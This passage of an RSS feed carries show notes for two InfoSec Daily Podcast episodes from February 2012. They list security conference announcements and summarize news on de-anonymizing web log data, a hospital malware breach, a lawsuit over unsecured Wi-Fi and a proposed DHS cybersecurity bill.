<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Clarion Hotel &#8211; Anaheim, CA</span><br />
	<a href="http://www.layerone.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.infoworld.com/d/security/microsoft-researchers-say-anonymized-data-isnt-so-anonymous-185624"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.infoworld.com/d/security/microsoft-researchers-say-anonymized-data-isnt-so-anonymous-185624</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Data routinely gathered in Web logs &#8212; IP address, cookie ID, operating system, browser type, user-agent strings &#8212; can threaten online privacy because they can be used to identify the activity of individual machines, Microsoft researchers say.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">At the same time, analysis of such data when anonymized can help detect malicious activity and so improve overall Internet security, they add.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The researchers found that 62 percent of the time, HTTP user-agent information alone can accurately tag a host. Combine that same information with the IP address, and the accuracy jumps to 80.6 percent. If the user-agent information is combined with just the IP prefix the accuracy is still 79.3 percent, they say.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The highest accuracy came when more than one user ID was linked to a single host, as would be the case in a family that shares a single computer. In such cases, multiple IDs would accurately represent that one host computer. The accuracy rate was 92.8 percent.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The analysis of this seemingly benign information was based on a month &#8211; August 2010 &#8211; of anonymized Hotmail and Bing data on hundreds of millions of users. The researchers say they tried to find out whether a single piece of log data can uniquely reveal a particular host.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">They found that even anonymized data can leak information. For example, replacing an IP address with its IP prefix still yields enough information that when combined with other commonly logged factors can be revealing. &quot;&quot;[C]oarse grained IP prefixes achieve similar host-tracking accuracy to that of precise IP address information when they are combined with hashed [user-agent] strings,&quot; the researchers say.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><a href="http://news.techworld.com/security/3335408/us-hospital-hit-by-data-stealing-malware/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.techworld.com/security/3335408/us-hospital-hit-by-data-stealing-malware/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">An Indiana hospital has had to write to 12,000 people after malware breached its security defences to compromise a server used to collect personal data from web forms.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The affected individuals were mostly people who might have applied for jobs at Goshen Hospital in recent years plus some outpatients. Information put at risk includes names, addresses, and social security numbers, the hospital has told local media.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The malware remains unidentified beyond it being described as &ldquo;a relatively common virus that is malicious,&rdquo; which suggests an infection that remained undetected for some time. Patient records are isolated from the Internet and were never at risk.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Affected individuals have been contacted by letter and asked to check their credit reports for possible identity fraud with the hospital picking up the tab for fraud monitoring checks for at least 12 months.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.computerworld.com/s/article/9224003/Copyright_lawsuit_targets_owners_of_non_secure_wireless_networks"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.computerworld.com/s/article/9224003/Copyright_lawsuit_targets_owners_of_non_secure_wireless_networks</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A federal lawsuit filed in Massachusetts could test the question of whether individuals who leave their wireless networks unsecured can be held liable if someone uses the network to illegally download copyrighted content.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The lawsuit was filed by Liberty Media Holdings LLC, a San Diego producer of adult content.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The company has accused more than 50 Massachusetts people, both named and unnamed, of using BitTorrent file-sharing technology to illegally download and share a gay porn movie.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to the compliant, the illegal downloads and sharing were traced to IP addresses belonging to the individuals named in the compliant and to several John Does. The complaint alleges that each of the defendants either was directly responsible for downloading and sharing the movie or contributed to the piracy through their negligence.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Even if the defendants did not directly download the movies, they had control over the Internet access used for copyright infringement purposes, the lawsuit noted.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;Defendants failed to adequately secure their Internet access, whether accessible only through their computer when physically connected to an Internet router or accessible to many computers by use of a wireless router,&quot; Liberty Media claimed. &quot;Defendants&#39; negligent actions allowed others to unlawfully copy and share Plaintiff&#39;s copyrighted Motion Picture, proximately causing financial harm to Plaintiff and unlawfully interfering with Plaintiff&#39;s exclusive rights in the Motion Picture.&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">//Beau &#8211; Better start investing in or inventing the home use content filter. Then double down with the home use content filter evader. I call first patent if you make money! </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://blogs.cio.com/security/16787/law-would-put-homeland-security-charge-business-it-security"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blogs.cio.com/security/16787/law-would-put-homeland-security-charge-business-it-security</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">How would you like the Department of Homeland Security to be in charge of your IT security?</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">If Congress has its way the folks who run the TSA would be given the power to require better computer security of companies with systems &quot;whose disruption could result in the interruption of life-sustaining services, catastrophic economic damage or severe degradation of national security capabilities.&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Don&rsquo;t worry too much, though. The decision about which companies to regulate would be made &ldquo;with input from businesses.&rdquo; For some reason that doesn&rsquo;t make me feel any better.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This is from the bill being pushed by Senate Majority Leader Harry Reid (D-Casinos) and supported by the White House. It&rsquo;s just one of 30 or so such bills currently percolating on the Hill. &nbsp;As with much legislation, it starts with a good intention: Shielding vital infrastructure, including the power grid and water supply, from cyber attack. It&rsquo;s believed that as much as 85 percent of the nation&rsquo;s critical infrastructure is owned and operated by private companies.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">And, as with much legislation, it basically extends government power without actually improving anything. Businesses already know hacking is costing them money &ndash; this is really the only incentive needed for them. Fortunately and unsurprisingly, a lot of industry groups are lobbying against this because of the additional costs it would mean. What businesses really want is a law that would give them legal protections so they can share information with authorities without risking antitrust or privacy violations.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-589-not-so-anonymous-indiana-malware-non-secure-wireless-tsa-manage-your-security/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3480/0/infosec-daily-podcast-episode-589.mp3" length="17303597" type="audio/mpeg" />
		<itunes:duration>0:36:00</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 589 for February 8, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Karthik Rangarajan.
	&#160;
Announcements:
Unsung Heroes
Have you ever stumbled on a tool and wondered &#8220;Why didn[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 589 for February 8, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Karthik Rangarajan.
	&#160;
Announcements:
Unsung Heroes
Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this last week on that test&#8221;&#8230; Chris John Riley has started to gather suggestions for your &#8220;unsung hero&#8221; of the tools world. &#160;He is looking specifically to gather a list of tools that aren&#8217;t on every penetration testers, or forensic investigators list, but that you have respect for. &#160;http://blog.c22.cc/2012/01/13/unsung-heros

	Information Security Blogger Awards 2012
	Since we were over looked again for the Best Podcast on Security you can email ashimmy@hotmail.com with your name, email address and ISD Podcast as your write-in nominee. &#160;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &#160;Vote for your favorite blogs as well on http://www.ashimmy.com.
	Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital ever since.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	Metasploit Framework Unleashed Cincinnati
	When: February 11, 2012. 
	Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&#8217;s College of Informatics
	https://msfucincy.wordpress.com/
	$20 donation for #HFC
	Social Engineering Training
	When: March 5-9, 2012
	Where: Seattle, Washington
	When: July 21-24, 2012
	Where: Black Hat Vegas
	When: August 20-24, 2012
	Where: &#160;Bristol, UK
	When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD 
	http://www.social-engineer.com/social-engineer-training
	InfoSec Southwest
	When: March 30-April 1
	Where: Austin, TX
	http://www.Infosecsouthwest.com
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open!
	LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
	CFP now open!
	DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;
Stories
Source: http://www.infoworld.com/d/security/microsoft-researchers-say-anonymized-data-isnt-so-anonymous-185624
	Data routinely gathered in Web logs &#8212; IP address, cookie ID, operating system, browser type, user-agent strings &#8212; can threaten online privacy because they can be used to identify the activity of individual machines, Microsoft researchers say.
	At the same time, analysis of such data when anonymized can help detect malicious activity and so improve overall Internet security, they add.
	The researchers found that 62 percent of the time, HTTP user-agent information alone can accurately tag a host. Combine that same information with the IP address, and the accuracy jumps to 80.6 percent. If the user-agent[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 588 &#8211; 50K Doh!, SendSpace, Patient Data, Mobile Leak &amp; No CRL for you!</title>
		<link>http://www.isdpodcast.com/episode-588-50k-doh-sendspace-patient-data-mobile-leak-no-crl-for-you</link>
		<comments>http://www.isdpodcast.com/episode-588-50k-doh-sendspace-patient-data-mobile-leak-no-crl-for-you#comments</comments>
		<pubDate>Wed, 08 Feb 2012 01:53:15 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3475</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 588 for February 7, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Themson Mester, and Varun Sharma. &#160; Announcements: Unsung Heroes Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this last week on that test&#8221;&#8230; [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 588 for February 7, 2012. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Themson Mester, and Varun Sharma.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Unsung Heroes</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Have you ever stumbled on a tool and wondered &ldquo;Why didn&rsquo;t I know this existed!&rdquo; or &ldquo;If only I&rsquo;d had this last week on that test&rdquo;&hellip; Chris John Riley has started to gather suggestions for your &ldquo;unsung hero&rdquo; of the tools world. &nbsp;He is looking specifically to gather a list of tools that aren&rsquo;t on every penetration testers, or forensic investigators list, but that you have respect for. &nbsp;</span><a href="http://blog.c22.cc/2012/01/13/unsung-heros"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.c22.cc/2012/01/13/unsung-heros</span></a></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital ever since.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Metasploit Framework Unleashed Cincinnati</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: February 11, 2012. </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&rsquo;s College of Informatics</span><br />
	<a href="https://msfucincy.wordpress.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://msfucincy.wordpress.com/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">$20 donation for #HFC</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 5-9, 2012<br class="kix-line-break" /><br />
	Where: Seattle, Washington</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: &nbsp;Bristol, UK</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD </span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Southwest</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 30-April 1</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Austin, TX</span><br />
	<a href="http://www.infosecsouthwest.com/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.Infosecsouthwest.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Clarion Hotel &#8211; Anaheim, CA</span><br />
	<a href="http://www.layerone.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
